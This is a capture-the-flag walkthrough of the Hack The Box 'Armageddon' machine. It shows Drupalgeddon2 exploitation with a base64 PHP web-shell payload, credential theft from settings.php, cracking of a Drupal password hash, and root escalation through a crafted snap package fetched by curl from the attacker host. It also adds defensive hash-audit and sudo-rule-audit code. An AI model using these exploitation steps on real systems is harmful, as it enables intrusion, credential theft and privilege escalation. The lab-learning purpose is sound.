HTB Armageddon

$ nmap -v -p- -A 10.10.10.233 --min-rate 5000

Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-27 10:26 EDT
...
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-title: Welcome to  Armageddon |  Armageddon
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16

....
Nmap done: 1 IP address (1 host up) scanned in 22.78 seconds

Site inspection:

http://10.10.10.233/

$ whatweb http://10.10.10.233

http://10.10.10.233 [200 OK] Apache[2.4.6], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[10.10.10.233], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PHP[5.4.16], PasswordField[pass], PoweredBy[Arnageddon], Script[text/javascript], Title[Welcome to  Armageddon |  Armageddon], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/5.4.16]

We are facing a Drupal 7 CMS.

$ dirsearch -u http://10.10.10.233/ -i 200

...

Target: http://10.10.10.233/

[10:52:58] Starting: 
[10:53:00] 200 -  317B  - /.editorconfig
[10:53:01] 200 -  174B  - /.gitignore
[10:53:05] 200 -    1KB - /COPYRIGHT.txt
[10:53:05] 200 -  109KB - /CHANGELOG.txt
[10:53:06] 200 -    2KB - /INSTALL.pgsql.txt
[10:53:06] 200 -    2KB - /INSTALL.mysql.txt
[10:53:06] 200 -   18KB - /INSTALL.txt
[10:53:06] 200 -   18KB - /LICENSE.txt
[10:53:06] 200 -    9KB - /MAINTAINERS.txt
[10:53:06] 200 -    5KB - /README.txt
[10:53:07] 200 -   10KB - /UPGRADE.txt
[10:53:34] 200 -   10KB - /includes/
[10:53:34] 200 -    7KB - /index.php
[10:53:35] 200 -    3KB - /install.php
[10:53:37] 200 -  132KB - /includes/bootstrap.inc
[10:53:41] 200 -    9KB - /modules/
[10:53:47] 200 -  278B  - /profiles/testing/testing.info
[10:53:47] 200 -  271B  - /profiles/minimal/minimal.info
[10:53:47] 200 -  743B  - /profiles/standard/standard.info
[10:53:49] 200 -    2KB - /robots.txt
[10:53:49] 200 -    3KB - /scripts/
[10:53:51] 200 -    0B  - /sites/example.sites.php
[10:53:51] 200 -  904B  - /sites/README.txt
[10:53:51] 200 -  151B  - /sites/all/libraries/README.txt
[10:53:51] 200 -    1KB - /sites/all/modules/README.txt
[10:53:51] 200 - 1020B  - /sites/all/themes/README.txt
[10:53:54] 200 -    2KB - /themes/
[10:53:58] 200 -    2KB - /web.config
[10:54:04] 200 -   42B  - /xmlrpc.php

Task Completed

http://10.10.10.233/includes/bootstrap.inc

Specifically, the exposed includes/bootstrap.inc reveals Drupal v7.56:

...
/**
 * The current system version.
 */
define('VERSION', '7.56');
...

Let's check whether this Drupal version has known vulnerabilities.

CVE-2018-7600 (Drupalgeddon2, fixed in Drupal 7.58):
https://github.com/dreadlocked/Drupalgeddon2

$ git clone https://github.com/dreadlocked/Drupalgeddon2.git
$ ruby drupalgeddon2.rb http://10.10.10.233

[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.233/
--------------------------------------------------------------------------------
[+] Found  : http://10.10.10.233/CHANGELOG.txt    (HTTP Response: 200)
[+] Drupal!: v7.56
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo MNRXASHW
[+] Result : MNRXASHW
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://10.10.10.233/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell:   curl 'http://10.10.10.233/shell.php' -d 'c=hostname'
armageddon.htb>> 

armageddon.htb>> whoami

apache

armageddon.htb>> pwd

/var/www/html

armageddon.htb>> ls /var/www/html/sites -la

total 12
drwxr-xr-x. 4 apache apache   75 Jun 21  2017 .
drwxr-xr-x. 9 apache apache 4096 May 28 16:46 ..
-rw-r--r--. 1 apache apache  904 Jun 21  2017 README.txt
drwxr-xr-x. 5 apache apache   52 Jun 21  2017 all
dr-xr-xr-x. 3 apache apache   67 Dec  3  2020 default
-rw-r--r--. 1 apache apache 2365 Jun 21  2017 example.sites.php

armageddon.htb>> ls /var/www/html/sites/default -la

total 56
dr-xr-xr-x. 3 apache apache    67 Dec  3  2020 .
drwxr-xr-x. 4 apache apache    75 Jun 21  2017 ..
-rw-r--r--. 1 apache apache 26250 Jun 21  2017 default.settings.php
drwxrwxr-x. 3 apache apache    37 Dec  3  2020 files
-r--r--r--. 1 apache apache 26565 Dec  3  2020 settings.php

armageddon.htb>> cat /var/www/html/sites/default/settings.php

...
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'CQHEy@9M*m23gBVj',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
...

Mysql password = CQHEy@9M*m23gBVj

armageddon.htb>> whereis mysql

mysql: /usr/bin/mysql /usr/lib64/mysql /usr/share/mysql /usr/share/man/man1/mysql.1.gz

armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj

armageddon.htb>>

The interactive MySQL client does not work through this web shell (there is no TTY), so we use the -e parameter to run queries directly.

armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'show databases;'

Database
information_schema
drupal
mysql
performance_schema

armageddon.htb>> mysql -u drupaluser -pCQHEy@9M*m23gBVj -e 'use drupal; select * from users'

uid	name	pass	mail	theme	signature	signature_format	created	access	login	status	timezone	language	picture	init	data
0						NULL	0	0	0	0	NULL		0		NULL
1	brucetherealadmin	$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt	admin@armageddon.eu			filtered_html	1606998756	1607077194	1607076276	1	Europe/London		0	admin@armageddon.eu	a:1:{s:7:"overlay";i:1;}

We have a Drupal 7 password hash for brucetherealadmin:

$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt

$ hashcat -m 7900 drupal.hash /usr/share/wordlists/rockyou.txt

hashcat (v6.2.5) starting

...

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7900 (Drupal7)
Hash.Target......: $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
Time.Started.....: Sat May 28 18:29:24 2022 (2 secs)
Time.Estimated...: Sat May 28 18:29:26 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      176 H/s (9.94ms) @ Accel:32 Loops:1024 Thr:1 Vec:2
Recovered........: 1/1 (100.00%) Digests
Progress.........: 256/14344385 (0.00%)
Rejected.........: 0/256 (0.00%)
Restore.Point....: 192/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:31744-32768
Candidate.Engine.: Device Generator
Candidates.#1....: alyssa -> freedom
Hardware.Mon.#1..: Util: 82%

Started: Sat May 28 18:28:48 2022
Stopped: Sat May 28 18:29:27 2022

So the password is booboo.

Credentials:
brucetherealadmin:booboo
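The $S$ prefix marks Drupal 7's phpass-derived hash format (hashcat mode 7900): a three-character prefix, one character giving log2 of the SHA-512 iteration count (here D, index 15 in the alphabet, so 2^15 = 32768 rounds, which is why hashcat reports Iteration:31744-32768 and crawls at 176 H/s), an 8-character salt, and a custom base64 encoding of the final digest truncated to 55 characters. The following Python re-implements Drupal 7's _password_crypt() and user_check_password() so a defender can audit the cost factor of stored hashes or confirm a password against one; it is an added example, not code from this writeup or from Drupal itself.

```python
import hashlib
import hmac
# Drupal 7 / phpass alphabet: a character's index is its 6-bit value.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55            # stored $S$ hashes are truncated to 55 chars

def _password_base64_encode(data: bytes) -> str:
    """Drupal's _password_base64_encode(): phpass-style base64, 3 bytes -> 4 chars."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)

def drupal7_iterations(stored: str) -> int:
    """SHA-512 rounds encoded in the 4th character of a $S$ hash ('D' -> 2**15)."""
    if len(stored) < 12 or stored[0] != "$" or stored[2] != "$":
        raise ValueError("not a Drupal 7 setting string")
    return 1 << ITOA64.index(stored[3])        # Drupal accepts log2 counts 7..30

def drupal7_crypt(password: str, setting: str) -> str:
    """Drupal 7 _password_crypt('sha512', ...): salted, iterated SHA-512."""
    setting = setting[:12]                     # "$S$" + count char + 8-char salt
    count = drupal7_iterations(setting)
    pw = password.encode("utf-8")
    salt = setting[4:12].encode("ascii")
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(count):                     # PHP: do {...} while (--$count)
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _password_base64_encode(digest))[:DRUPAL_HASH_LENGTH]

def drupal7_verify(password: str, stored: str) -> bool:
    """What user_check_password() does for $S$ hashes: recompute and compare."""
    if not stored.startswith("$S$"):
        return False                           # legacy $P$/$H$ MD5 forms not handled
    return hmac.compare_digest(drupal7_crypt(password, stored), stored)
```

A rockyou word surviving 32768 rounds is still a weak password: the iteration count slows each guess linearly, it does not rescue a guessable password.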

$ ssh brucetherealadmin@10.10.10.233

The authenticity of host '10.10.10.233 (10.10.10.233)' can't be established.
ED25519 key fingerprint is SHA256:rMsnEyZLB6x3S3t/2SFrEG1MnMxicQ0sVs9pFhjchIQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.233' (ED25519) to the list of known hosts.
brucetherealadmin@10.10.10.233's password: 
Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$

[brucetherealadmin@armageddon ~]$ ls

user.txt

[brucetherealadmin@armageddon ~]$ cat user.txt

ede8XXXXXXXXXXXXXXXXXXXXXXXXXXXX

Now let's go for the root flag.

[brucetherealadmin@armageddon ~]$ sudo -l

Matching Defaults entries for brucetherealadmin on armageddon:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *

We can run snap install as root without a password.
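This is the rule a defender should have caught in review: a NOPASSWD entry whose trailing wildcard lets the caller append whatever options snap accepts. The following Python is an added example (not from this writeup) that parses sudo -l output, using the box's rule plus one constructed benign rule for contrast, and flags NOPASSWD, wildcard arguments and binaries known to run code as root; the CODE_EXEC_BINARIES table is an assumption you would extend from GTFOBins for your own fleet.

```python
import re
# "sudo -l" output as seen on the box, plus one constructed benign rule for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for brucetherealadmin on armageddon:
User brucetherealadmin may run the following commands on armageddon:
    (root) NOPASSWD: /usr/bin/snap install *
    (root) /usr/bin/systemctl restart httpd
"""
# Binaries whose sudo rules give code execution as the run-as user even with an
# argument restriction (see GTFOBins); assumed starter list, extend for your estate.
CODE_EXEC_BINARIES = {
    "snap": "snap install --dangerous runs the package's install hook as root",
}
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")

def parse_sudo_l(output: str) -> list:
    """Return the user-specification rules from `sudo -l` output as dicts."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        argv = m.group("cmd").split()
        rules.append({
            "runas": m.group("runas"),
            "tags": set(m.group("tags").replace(":", " ").split()),
            "binary": argv[0].rsplit("/", 1)[-1],
            "args": argv[1:],
            "cmd": m.group("cmd"),
        })
    return rules

def audit(rules: list) -> list:
    """Flag rules a reviewer should look at; returns (cmd, [reasons]) pairs."""
    findings = []
    for r in rules:
        reasons = []
        if "NOPASSWD" in r["tags"]:
            reasons.append("NOPASSWD: no re-authentication before running as " + r["runas"])
        if any("*" in a for a in r["args"]):
            reasons.append("wildcard argument: sudoers '*' also matches spaces, so extra options pass")
        if r["binary"] in CODE_EXEC_BINARIES:
            reasons.append(CODE_EXEC_BINARIES[r["binary"]])
        if reasons:
            findings.append((r["cmd"], reasons))
    return findings
```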

According to https://gtfobins.github.io/gtfobins/snap/, a sudo rule for snap can be abused to run commands as root by installing a crafted package whose install hook carries the command:

COMMAND=id
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta
sudo snap install xxxx_1.0_all.snap --dangerous --devmode

First, install fpm on the attacking machine (if it is not already installed):
https://github.com/jordansissel/fpm

$ sudo gem install fpm

[brucetherealadmin@armageddon ~]$ cp /usr/bin/bash .
[brucetherealadmin@armageddon ~]$ ls -la

total 960
drwx------. 2 brucetherealadmin brucetherealadmin    111 may 29 10:02 .
drwxr-xr-x. 3 root              root                  31 dic  3  2020 ..
-rwxr-xr-x. 1 brucetherealadmin brucetherealadmin 964536 may 29 10:02 bash
lrwxrwxrwx. 1 root              root                   9 dic 11  2020 .bash_history -> /dev/null
-rw-r--r--. 1 brucetherealadmin brucetherealadmin     18 abr  1  2020 .bash_logout
-rw-r--r--. 1 brucetherealadmin brucetherealadmin    193 abr  1  2020 .bash_profile
-rw-r--r--. 1 brucetherealadmin brucetherealadmin    231 abr  1  2020 .bashrc
-r--------. 1 brucetherealadmin brucetherealadmin     33 may 28 16:33 user.txt

Now we create a new snap package that will be uploaded to the box.

$ COMMAND="chown root:root /home/brucetherealadmin/bash;chmod 4755 /home/brucetherealadmin/bash" 
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n aaa -s dir -t snap -a all meta 

Created package {:path=>"aaa_1.0_all.snap"}

This package's install hook changes the owner of the bash copy in bruce's home directory to root and sets the SUID bit on it. The hook deliberately ends with false, so snap will report the install as failed even though the command has already run as root.

$ sudo python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.233 - - [29/May/2022 11:15:15] "GET /aaa_1.0_all.snap HTTP/1.1" 200 -

[brucetherealadmin@armageddon ~]$ curl http://10.10.14.31:8000/aaa_1.0_all.snap -o aaa.snap

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4096  100  4096    0     0  46520      0 --:--:-- --:--:-- --:--:-- 

[brucetherealadmin@armageddon ~]$ sudo snap install aaa.snap --dangerous --devmode

error: cannot perform the following tasks:
- Run install hook of "aaa" snap if present (run hook "install": exit status 1)

[brucetherealadmin@armageddon ~]$ ls -la

total 964
drwx------. 2 brucetherealadmin brucetherealadmin    127 may 29 10:15 .
drwxr-xr-x. 3 root              root                  31 dic  3  2020 ..
-rw-rw-r--. 1 brucetherealadmin brucetherealadmin   4096 may 29 10:15 aaa.snap
-rwsr-xr-x. 1 root              root              964536 may 29 10:02 bash
lrwxrwxrwx. 1 root              root                   9 dic 11  2020 .bash_history -> /dev/null
-rw-r--r--. 1 brucetherealadmin brucetherealadmin     18 abr  1  2020 .bash_logout
-rw-r--r--. 1 brucetherealadmin brucetherealadmin    193 abr  1  2020 .bash_profile
-rw-r--r--. 1 brucetherealadmin brucetherealadmin    231 abr  1  2020 .bashrc
-r--------. 1 brucetherealadmin brucetherealadmin     33 may 28 16:33 user.txt

[brucetherealadmin@armageddon ~]$ ./bash -p

bash-4.2#

The -p flag turns on privileged mode: without it, bash resets the effective UID to the real UID when they differ, which would discard the root privilege granted by the SUID bit.
https://linux.die.net/man/1/bash

bash-4.2# cd /root/
bash-4.2# ls

anaconda-ks.cfg  cleanup.sh  passwd  reset.sh  root.txt  snap

bash-4.2# cat root.txt

a2e8XXXXXXXXXXXXXXXXXXXXXXXXXXXX